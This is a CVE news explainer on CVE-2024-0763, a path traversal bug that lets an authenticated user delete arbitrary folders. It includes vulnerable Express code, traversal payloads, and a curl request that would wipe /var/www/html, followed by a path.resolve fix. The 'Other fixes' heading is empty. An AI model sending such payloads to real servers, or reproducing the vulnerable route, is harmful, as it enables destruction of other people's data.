CVE CyberSecurity Database News

CVE-2024-0763 - How Bad Folder Sanitization Lets Authenticated Users Delete Any Folder on Your Server

Poster -

Summary:
CVE-2024-0763 is a serious vulnerability that allows any authenticated user to delete any folder (including all its contents) on a remote server. This happens because of improper input sanitization in a folder-deletion endpoint, leading to a path traversal attack. If a user has credentials and can call this endpoint, they can wipe out any file or folder the service account can access. Here, we’ll walk through the details, see code snippets from a vulnerable server, and understand how the exploit works.

1. The Vulnerability Explained

This bug affects web applications (often built with Node.js, Python, PHP, or similar) that provide an endpoint to delete folders. Usually, admins use this to manage files, but due to bad filtering of user-provided folder names, an attacker can craft a special folder path that “escapes” the allowed area and deletes arbitrary folders. The only requirement is that the attacker must be authenticated—so the endpoint is not public, but any registered user may exploit it.

Path Traversal Recap

Path Traversal is when a user can use directory ‘escape’ characters like ../ to access files or folders outside the intended directory. For example, if the server runs this:

const fs = require('fs');
app.post('/delete-folder', auth, (req, res) => {
  const { folder } = req.body;
  const targetPath = "/srv/uploads/" + folder;
  fs.rmSync(targetPath, { recursive: true, force: true });
  res.json({ ok: true });
});

and the user submits

{
  "folder": "../../etc"
}

The server will run

fs.rmSync("/srv/uploads/../../etc", { recursive: true, force: true });

meaning it deletes /etc and everything inside! If the service runs as root or with broad permissions, this is catastrophic.

Let’s look at a simple but realistic Node.js Express example

// Express.js route (vulnerable)
app.post('/api/folders/delete', isAuthenticated, (req, res) => {
  const folderParam = req.body.folder; // User input!
  const basePath = '/home/app/data/';
  const target = basePath + folderParam;
  
  // Dangerous: No folder name checks!
  fs.rmSync(target, { recursive: true, force: true });
  res.json({ status: 'Deleted', target });
});

Why is this dangerous?
The server trusts whatever folder name the client sends—no validation, no filtering. The attacker can use ../ to climb up directories and delete anything.

3. The Exploit: Step-by-step

Requirements:
- An attacker has a valid username/password or API token (even as a basic user)

Knows the protected folder deletion endpoint (often guessable or easily found)

- The backend service account has permissions to delete files/folders outside the intended area

Example (using curl)

curl -X POST https://victim.site/api/folders/delete \
  -H "Authorization: Bearer [valid token]" \
  -H "Content-Type: application/json" \
  -d '{"folder":"../../../../var/www/html"}'

Server Receives Path:

The backend builds: /home/app/data/../../../../var/www/html
Which is resolved by Node.js as /var/www/html

Deletion:

The rmSync call deletes everything recursively in /var/www/html!

4. How to Fix It

The proper way to stop this attack is to sanitize user input and enforce the folder stays inside the allowed directory. Here’s how you can do it in Node.js:

const path = require('path');
const fs = require('fs');

app.post('/api/folders/delete', isAuthenticated, (req, res) => {
  const basePath = '/home/app/data/';
  const folderParam = req.body.folder;
  
  // Compute… then check resolved path is within basePath
  const resolved = path.resolve(basePath, folderParam);

  if (!resolved.startsWith(basePath)) {
    return res.status(400).json({ error: "Invalid folder path" });
  }
  fs.rmSync(resolved, { recursive: true, force: true });
  res.json({ status: 'Deleted', target: resolved });
});

Other fixes:

5. Original References

- NIST CVE-2024-0763 Entry (pending publication)
- OWASP Path Traversal Cheat Sheet
- Node.js path.resolve documentation
- fs.rmSync documentation
- Directory Traversal Attack, Wikipedia

6. Conclusion

CVE-2024-0763 highlights the classic dangers of trusting user input. Path traversal issues are common, even in endpoints that seem safe, like authenticated admin features. Any “delete” or file access endpoint needs strict input checks and user role validation. The impact can be total server compromise—even simple folder or file management APIs can be a vector for mass data loss.

Double check your endpoints. Always sanitize. Never trust user input.

If you liked this deep dive, please share to help others spot and fix this bug in their own codebases!

Timeline

Published on: 02/27/2024 22:15:14 UTC
Last modified on: 02/28/2024 14:06:45 UTC